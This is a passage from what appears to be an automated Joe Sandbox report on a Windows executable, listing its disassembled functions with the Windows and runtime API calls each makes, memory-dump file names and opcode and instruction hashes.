                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Heap$AllocInformationProcessToken$CopyErrorLastLength
                                                              • String ID:
                                                              • API String ID: 4217664535-0
                                                              • Opcode ID: 4bf1965308ca43e8a48670c7fbde4b064a56a3673648b51fedcc1d2feff18c48
                                                              • Instruction ID: 461a7af7bccd1ecac7a6aedebdb2f924ea1de3323dbc0611b38091d0d069d078
                                                              • Opcode Fuzzy Hash: 4bf1965308ca43e8a48670c7fbde4b064a56a3673648b51fedcc1d2feff18c48
                                                              • Instruction Fuzzy Hash: 3E119171A11205FFDB04EFA9DD99AAFB7B9EF85304F14802DEA4297210D731AE44DB20
                                                              Function 00AEB478 Relevance: 6.1, APIs: 4, Instructions: 58windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 00AEB498
                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00AEB4AA
                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00AEB4C0
                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00AEB4DB
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID:
                                                              • API String ID: 3850602802-0
                                                              • Opcode ID: da3aa0b6a3f5c6d7be5d9c506e617dadf695da09d18b34c4dc57808442a0dc8a
                                                              • Instruction ID: 9bc359d1bf8d7da2bba0fb8d66b1f9856e3045af5a823cb58b037e6dd617189b
                                                              • Opcode Fuzzy Hash: da3aa0b6a3f5c6d7be5d9c506e617dadf695da09d18b34c4dc57808442a0dc8a
                                                              • Instruction Fuzzy Hash: 9B112A7A900218FFEB11DFA9C985E9EBBB4FB08710F204091E604B7295D771AE11DBA4
                                                              Function 00ACB55D Relevance: 6.1, APIs: 4, Instructions: 56COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00ACB34E: GetWindowLongW.USER32(?,000000EB), ref: 00ACB35F
                                                              • DefDlgProcW.USER32(?,00000020,?,00000000), ref: 00ACB5A5
                                                              • GetClientRect.USER32(?,?), ref: 00B2E69A
                                                              • GetCursorPos.USER32(?), ref: 00B2E6A4
                                                              • ScreenToClient.USER32(?,?), ref: 00B2E6AF
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Client$CursorLongProcRectScreenWindow
                                                              • String ID:
                                                              • API String ID: 4127811313-0
                                                              • Opcode ID: 3f7cc20d512798390fac75459215d54be6a098fdc7988ef4b4e342e6028d2bc7
                                                              • Instruction ID: 83b6d7019b48c6463b23e4e989b0a7e616939600fec2232024237fc2c23dee64
                                                              • Opcode Fuzzy Hash: 3f7cc20d512798390fac75459215d54be6a098fdc7988ef4b4e342e6028d2bc7
                                                              • Instruction Fuzzy Hash: BA113631910029BFCB10DFA8E946DEE7BB9EB08305F110895F916E7140D730AA96CBB1
                                                              Function 00AF732B Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetCurrentThreadId.KERNEL32 ref: 00AF7352
                                                              • MessageBoxW.USER32(?,?,?,?), ref: 00AF7385
                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00AF739B
                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00AF73A2
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                              • String ID:
                                                              • API String ID: 2880819207-0
                                                              • Opcode ID: 9fbbd1eeb66690211b26ec593bb98c72189c56d14584ce0f4533db74e5c06ab4
                                                              • Instruction ID: 110835573549ef6809fc64fd5ea9257df769648c0c73bf9b4a5e10784f10dddd
                                                              • Opcode Fuzzy Hash: 9fbbd1eeb66690211b26ec593bb98c72189c56d14584ce0f4533db74e5c06ab4
                                                              • Instruction Fuzzy Hash: E2112BB2A04209BFC7019FACDC05EAE7BED9B44310F244315F925D3251DB708D0097A0
                                                              Function 00ACD17C Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00ACD1BA
                                                              • GetStockObject.GDI32(00000011), ref: 00ACD1CE
                                                              • SendMessageW.USER32(00000000,00000030,00000000), ref: 00ACD1D8
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: CreateMessageObjectSendStockWindow
                                                              • String ID:
                                                              • API String ID: 3970641297-0
                                                              • Opcode ID: 9a8749d2f598796ab7cc87ad7b3e0ca1d407240465fc5528cff65009c7a5260f
                                                              • Instruction ID: 02a63d44e317e12b8c4e87f214453f946c81e89f3e0a8fc7bf55d97ee7459035
                                                              • Opcode Fuzzy Hash: 9a8749d2f598796ab7cc87ad7b3e0ca1d407240465fc5528cff65009c7a5260f
                                                              • Instruction Fuzzy Hash: B611C072101509BFEF024FA4EC55EEABB69FF09364F190229FA1452150CB31DC60DBA0
                                                              Function 00AE4DF2 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                              • String ID:
                                                              • API String ID: 3016257755-0
                                                              • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                              • Instruction ID: 9356a4bd10974255f11dcb6550a2b9b7d0d4e3735bb577f469fdf79100e46305
                                                              • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                              • Instruction Fuzzy Hash: 91014B3640018ABBCF126F95DD168EE3F2BBB1C354B588455FA2859031D336CAB1AB81
                                                              Function 00AD7452 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00AD7A0D: __getptd_noexit.LIBCMT ref: 00AD7A0E
                                                              • __lock.LIBCMT ref: 00AD748F
                                                              • InterlockedDecrement.KERNEL32(?), ref: 00AD74AC
                                                              • _free.LIBCMT ref: 00AD74BF
                                                              • InterlockedIncrement.KERNEL32(00C84A10), ref: 00AD74D7
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                                              • String ID:
                                                              • API String ID: 2704283638-0
                                                              • Opcode ID: b2a7e9c83bdefd7b89ea1b420860e2a75badc563a0c8825c7ed1eb0a7cb4d9a5
                                                              • Instruction ID: e6be1b13b57b0a4836e75cea09cec53f9167c56d1df0f7b28101042e15837426
                                                              • Opcode Fuzzy Hash: b2a7e9c83bdefd7b89ea1b420860e2a75badc563a0c8825c7ed1eb0a7cb4d9a5
                                                              • Instruction Fuzzy Hash: 5B01D672909621ABCB1BAF24A60675DBB70BF04710F14410BF81673790EB345D40CFC6
                                                              Function 00AD7A94 Relevance: 6.0, APIs: 4, Instructions: 41COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • __lock.LIBCMT ref: 00AD7AD8
                                                                • Part of subcall function 00AD7CF4: __mtinitlocknum.LIBCMT ref: 00AD7D06
                                                                • Part of subcall function 00AD7CF4: EnterCriticalSection.KERNEL32(00000000,?,00AD7ADD,0000000D), ref: 00AD7D1F
                                                              • InterlockedIncrement.KERNEL32(?), ref: 00AD7AE5
                                                              • __lock.LIBCMT ref: 00AD7AF9
                                                              • ___addlocaleref.LIBCMT ref: 00AD7B17
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                                              • String ID:
                                                              • API String ID: 1687444384-0
                                                              • Opcode ID: d0980ac4f1359861b6f1f9c2de5b596f5d9450c77c1dc65db86fb840ca4c712e
                                                              • Instruction ID: f7fbc9d52278558248412b0546e169c9d60f8054d0f0c00a09e3f8e149391ac7
                                                              • Opcode Fuzzy Hash: d0980ac4f1359861b6f1f9c2de5b596f5d9450c77c1dc65db86fb840ca4c712e
                                                              • Instruction Fuzzy Hash: 4E015772405B00AED7209F75DA0674ABBF0EF40325F20894FE4AB973A0DBB4A680CB01
                                                              Function 00B1E32E Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _memset.LIBCMT ref: 00B1E33D
                                                              • _memset.LIBCMT ref: 00B1E34C
                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00B73D00,00B73D44), ref: 00B1E37B
                                                              • CloseHandle.KERNEL32 ref: 00B1E38D
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: _memset$CloseCreateHandleProcess
                                                              • String ID:
                                                              • API String ID: 3277943733-0
                                                              • Opcode ID: 5330aafcd44298639f099372577d4fae9d05ef18660c32d9145e10a287c7a132
                                                              • Instruction ID: 383cd5c2f8977e6c1905d82e26cd74d09d11ed5bde8eb8ad55773085c277cca9
                                                              • Opcode Fuzzy Hash: 5330aafcd44298639f099372577d4fae9d05ef18660c32d9145e10a287c7a132
                                                              • Instruction Fuzzy Hash: 2BF05EF1540314BBE3201B60AC49F7B7EDCDB05B54F004432BE4DD71A2DB759E40A6A9
                                                              Function 00B1EA6A Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00ACAF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00ACAFE3
                                                                • Part of subcall function 00ACAF83: SelectObject.GDI32(?,00000000), ref: 00ACAFF2
                                                                • Part of subcall function 00ACAF83: BeginPath.GDI32(?), ref: 00ACB009
                                                                • Part of subcall function 00ACAF83: SelectObject.GDI32(?,00000000), ref: 00ACB033
                                                              • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00B1EA8E
                                                              • LineTo.GDI32(00000000,?,?), ref: 00B1EA9B
                                                              • EndPath.GDI32(00000000), ref: 00B1EAAB
                                                              • StrokePath.GDI32(00000000), ref: 00B1EAB9
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                              • String ID:
                                                              • API String ID: 1539411459-0
                                                              • Opcode ID: 6ef93e8467604d965d31a8e51b21f05b72ebd0ff719f92ea7926b0c389220a29
                                                              • Instruction ID: a3c69f1a0e50aed9a15396af49e7c53105d5dbecb31b5303284fc0578e2ecfde
                                                              • Opcode Fuzzy Hash: 6ef93e8467604d965d31a8e51b21f05b72ebd0ff719f92ea7926b0c389220a29
                                                              • Instruction Fuzzy Hash: 05F0BE31045258BBDB129FA8AC09FCE3F69AF06710F144101FE11620E18BB49595CBA5
                                                              Function 00AEC82D Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00AEC84A
                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 00AEC85D
                                                              • GetCurrentThreadId.KERNEL32 ref: 00AEC864
                                                              • AttachThreadInput.USER32(00000000), ref: 00AEC86B
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                              • String ID:
                                                              • API String ID: 2710830443-0
                                                              • Opcode ID: d5fce5c9fa32066c88f66ede109ec633f9ca94c5c453fbe072660947afd9c265
                                                              • Instruction ID: 302d2492176112f8be2a5ed258e64cb57361e6e665de469402c273ad64f78a77
                                                              • Opcode Fuzzy Hash: d5fce5c9fa32066c88f66ede109ec633f9ca94c5c453fbe072660947afd9c265
                                                              • Instruction Fuzzy Hash: 7EE03971141268BADB202FA2AC0EEDB7F2CEF067A1F008021B60996460CAB18581DBE0
                                                              Function 00AEB0CD Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetCurrentThread.KERNEL32 ref: 00AEB0D6
                                                              • OpenThreadToken.ADVAPI32(00000000,?,?,?,00AEAC9D), ref: 00AEB0DD
                                                              • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00AEAC9D), ref: 00AEB0EA
                                                              • OpenProcessToken.ADVAPI32(00000000,?,?,?,00AEAC9D), ref: 00AEB0F1
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: CurrentOpenProcessThreadToken
                                                              • String ID:
                                                              • API String ID: 3974789173-0
                                                              • Opcode ID: b66e78450686eebc99021688a4fd026ec1c29f7c2c901e8ee56765ee28b13257
                                                              • Instruction ID: c16527699c1aa8627a0d3e8030f57fd7502fca6e3f3d109e77fe954ef8e3bfdf
                                                              • Opcode Fuzzy Hash: b66e78450686eebc99021688a4fd026ec1c29f7c2c901e8ee56765ee28b13257
                                                              • Instruction Fuzzy Hash: 46E086327412119BD7205FB26D0CB4F3BACEF55B91F218818F241E7040DF349401CB60
                                                              Function 00ACB47D Relevance: 6.0, APIs: 4, Instructions: 22COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetSysColor.USER32(00000008), ref: 00ACB496
                                                              • SetTextColor.GDI32(?,000000FF), ref: 00ACB4A0
                                                              • SetBkMode.GDI32(?,00000001), ref: 00ACB4B5
                                                              • GetStockObject.GDI32(00000005), ref: 00ACB4BD
                                                              • GetWindowDC.USER32(?,00000000), ref: 00B2DE2B
                                                              • GetPixel.GDI32(00000000,00000000,00000000), ref: 00B2DE38
                                                              • GetPixel.GDI32(00000000,?,00000000), ref: 00B2DE51
                                                              • GetPixel.GDI32(00000000,00000000,?), ref: 00B2DE6A
                                                              • GetPixel.GDI32(00000000,?,?), ref: 00B2DE8A
                                                              • ReleaseDC.USER32(?,00000000), ref: 00B2DE95
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                              • String ID:
                                                              • API String ID: 1946975507-0
                                                              • Opcode ID: 06e65f93fb7007205df528a812feeb8270628807c8ae289a9790301f8640d136
                                                              • Instruction ID: 104a8cae73ffe341410a4902ab0fe4bb8820bba1f20712dfd030d9bf95b92afb
                                                              • Opcode Fuzzy Hash: 06e65f93fb7007205df528a812feeb8270628807c8ae289a9790301f8640d136
                                                              • Instruction Fuzzy Hash: FCE0ED31504640ABDF216B64BC09BDC7B61EB51335F24C66AF679690E1CB724581DB11
                                                              Function 00B2B29A Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: CapsDesktopDeviceReleaseWindow
                                                              • String ID:
                                                              • API String ID: 2889604237-0
                                                              • Opcode ID: 645b6f8af8e298822f7dcc51ce5206e987768ec1c23f2fcf27a58a4fb25c4910
                                                              • Instruction ID: d7f8bf56682a032d4a7f5f99fd19ad67fb7d279d8b78efddc814862460295722
                                                              • Opcode Fuzzy Hash: 645b6f8af8e298822f7dcc51ce5206e987768ec1c23f2fcf27a58a4fb25c4910
                                                              • Instruction Fuzzy Hash: A8E046B1100204EFDB005F70E849A2E7BA8EB4C350F22C81AFC6E8B210CF7598408B40
                                                              Function 00AEB2D4 Relevance: 6.0, APIs: 4, Instructions: 20synchronizationCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00AEB2DF
                                                              • UnloadUserProfile.USERENV(?,?), ref: 00AEB2EB
                                                              • CloseHandle.KERNEL32(?), ref: 00AEB2F4
                                                              • CloseHandle.KERNEL32(?), ref: 00AEB2FC
                                                                • Part of subcall function 00AEAB24: GetProcessHeap.KERNEL32(00000000,?,00AEA848), ref: 00AEAB2B
                                                                • Part of subcall function 00AEAB24: HeapFree.KERNEL32(00000000), ref: 00AEAB32
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                              • String ID:
                                                              • API String ID: 146765662-0
                                                              • Opcode ID: fc410aa9e3b33867e42206ec9d933ca1d4d3f0fbb646a21579e559edbb4f01de
                                                              • Instruction ID: 150fd28412c24e93671db29946f810095bee5b212724b1d8a9fe811688d0ba5d
                                                              • Opcode Fuzzy Hash: fc410aa9e3b33867e42206ec9d933ca1d4d3f0fbb646a21579e559edbb4f01de
                                                              • Instruction Fuzzy Hash: 61E0263A104405FBDB016BA6EC0885DFBB6FF993213208621F62682575CF32A871EB95
                                                              Function 00B2B2AE Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
